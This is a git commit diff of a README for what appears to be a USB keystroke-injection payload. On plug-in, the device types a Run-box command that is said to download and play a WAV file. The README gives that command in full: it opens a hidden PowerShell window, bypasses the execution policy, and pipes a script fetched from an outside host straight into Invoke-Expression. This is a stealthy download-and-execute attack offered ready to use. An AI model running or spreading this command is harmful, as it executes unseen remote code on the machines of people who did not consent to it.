Update README.md
This commit is contained in:
parent
1d6b5c4fd8
commit
a79cbacacc
1 changed files with 2 additions and 1 deletions
|
@ -28,15 +28,16 @@ After one is the WAV file will be played.
|
||||||
|
|
||||||
### Dependencies
|
### Dependencies
|
||||||
|
|
||||||
* DropBox - Your Shared link for the intended file
|
|
||||||
* Windows 10,11
|
* Windows 10,11
|
||||||
|
|
||||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
||||||
### Executing program
|
### Executing program
|
||||||
|
|
||||||
|
* Place the WAV Url in the $wav variable
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
|
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
|
||||||
|
|
||||||
```
|
```
|
||||||
powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex
|
powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex
|
||||||
```
|
```
|
||||||
|
|
Loading…
Reference in a new issue